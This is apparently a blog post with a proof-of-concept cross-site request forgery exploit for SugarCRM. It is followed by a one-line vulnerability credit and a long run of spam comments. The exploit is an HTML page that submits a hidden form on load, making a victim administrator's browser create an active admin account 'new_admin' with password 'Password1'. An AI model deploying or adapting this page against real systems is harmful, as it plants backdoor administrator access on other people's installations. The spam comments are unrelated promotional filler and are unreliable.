PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&display_tabs[]=Dashboard&display_tabs[]=Calendar&display_tabs[]=Activities&display_tabs[]=Leads&display_tabs[]=Contacts&display_tabs[]=Accounts&display_tabs[]=Opportunities&display_tabs[]=Emails&display_tabs[]=Campaigns&display_tabs[]=Cases&display_tabs[]=Documents&" />
<input type="hidden" name="hide_tabs_def" value="" />
<input type="hidden" name="remove_tabs_def" value="" />
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="page" value="EditView" />
<input type="hidden" name="return_module" value="Users" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="DetailView" />
<input type="hidden" name="password_change" value="true" />
<input type="hidden" name="required_password" value="1" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="is_group" value="0" />
<input type="hidden" name="portal_only" value="" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="is_current_admin" value="1" />
<input type="hidden" name="required_email_address" value="0" />
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="unique_name" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="status" value="Active" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="old_password" value="" />
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
<input type="hidden" name="emailAddressWidget" value="1" />
<input type="hidden" name="emailAddress0" value="" />
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
<input type="hidden" name="emailAddressVerifiedValue0" value="" />
<input type="hidden" name="useEmailWidget" value="true" />
<input type="hidden" name="email_link_type" value="sugar" />
<input type="hidden" name="mail_smtpuser" value="" />
<input type="hidden" name="mail_smtppass" value="" />
<input type="hidden" name="employee_status" value="Active" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="phone_work" value="" />
<input type="hidden" name="department" value="" />
<input type="hidden" name="phone_mobile" value="" />
<input type="hidden" name="reports_to_name" value="" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="phone_other" value="" />
<input type="hidden" name="phone_fax" value="" />
<input type="hidden" name="phone_home" value="" />
<input type="hidden" name="messenger_type" value="" />
<input type="hidden" name="messenger_id" value="" />
<input type="hidden" name="address_street" value="" />
<input type="hidden" name="address_city" value="" />
<input type="hidden" name="address_state" value="" />
<input type="hidden" name="address_postalcode" value="" />
<input type="hidden" name="address_country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="receive_notifications" value="12" />
<input type="hidden" name="export_delimiter" value="," />
<input type="hidden" name="mailmerge_on" value="0" />
<input type="hidden" name="reminder_time" value="60" />
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />
<input type="hidden" name="user_max_tabs" value="12" />
<input type="hidden" name="user_max_subtabs" value="12" />
<input type="hidden" name="user_subpanel_tabs" value="on" />
<input type="hidden" name="dateformat" value="m/d/Y" />
<input type="hidden" name="currency" value="-99" />
<input type="hidden" name="timeformat" value="H:i" />
<input type="hidden" name="default_currency_significant_digits" value="2" />
<input type="hidden" name="timezone" value="Africa/Abidjan" />
<input type="hidden" name="ut" value="0" />
<input type="hidden" name="num_grp_sep" value="," />
<input type="hidden" name="default_locale_name_format" value="s f l" />
<input type="hidden" name="dec_sep" value="." />
<input type="hidden" name="calendar_publish_key" value="" />
<input type="hidden" name="outboundtest_from_address" value="" />
</form>
</body>
</html>
John Leitch has discovered a vulnerability in SugarCRM, which can be exploited by malicious people to conduct cross-site request forgery attacks.
ReplyDeletechurches in fresno ca
เบต้ากลูแคนมะโฮราคาถูก
i can not understand :|
ReplyDelete__________________
cheapest website designforumlinkbuilding company
When the matter in the content is valued according to guidelines as per the search engines, then it gets a full priority in the index
ReplyDeleteof search engines. Once you achieve a good ranking by search engines, your website will be made visible to clients on the first page.
website design templates
ecommerce web design
J.Design Group with over 25 years of experience offers a complete range of high end interior design services and decoration of commercial and residential outfits in different communities throughout Florida
ReplyDeleteModern interior designer
install windows 8 from pendrive
There is a proven connection between prebiotics and weight loss, although they certainly aren't a miracle cure. Find out how to maximize the weight loss and other health benefits you get from these prebiotics.
ReplyDeleteindvendige dvre
e cigarette
Americans throw away about 25 billion Styrofoam coffee cups every year, and 2.5 million plastic beverage bottles every hour. Most of these materials do not biodegrade.
ReplyDeletePassages Malibu Treatment
alarm service companies
celebrity rumorshervey bay accomodationThe cost of the 3G access for all 3G-enabled Kindles is bundled into the purchase price of the Kindle. This means that Kindle 3G users do not have to subscribe to a data service.
ReplyDeleteAmazon also offers the Kindle Keyboard with 3G service, but the device is not sold at AT&T retail locations.
Amazon also sells Kindle e-readers without 3G service. These devices cost about $50 less than the 3G versions and they
This is a nice article you shared great information i have read it thanks for giving such a wonderful blog for the reader. 192.168.l.l It’s used to enter in web-interface which also known as admin panel.
ReplyDelete